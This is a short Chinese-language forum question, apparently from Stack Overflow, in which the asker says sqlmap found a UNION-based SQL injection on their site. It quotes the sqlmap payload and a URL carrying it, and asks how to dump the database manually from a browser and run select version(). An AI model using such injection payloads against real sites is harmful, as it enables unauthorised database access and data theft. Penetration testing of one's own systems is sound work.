【发布时间】:2012-08-08 13:28:55
【问题描述】:
我正在尝试了解 SQLmap 的工作原理。
例如,sqlmap 在我的网站上发现注入 -
Place: GET
Parameter: selected
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: act=il&ed=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6,0x579786e676651,0x373a), NULL, NULL, NULL, NULL#
使用 SQLmap,我可以转储数据库,但是如何从浏览器中转储相同的数据库?我尝试将以下链接放入浏览器,但它不起作用 -
http://www.site.com/index.php?act=il&ed=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6,0x579786e676651,0x373a), NULL, NULL, NULL, NULL#
我的浏览器根本没有得到任何结果。我尝试了不同的方式来放置 /**/ 和 + 等等,但是很糟糕。
如何获取 Sqlmap 发送的渗透测试链接?
如何通过这种注入来利用简单的 select version() 查询?
也许这真的不起作用?
【问题讨论】:
标签: sql sql-injection penetration-testing sqlmap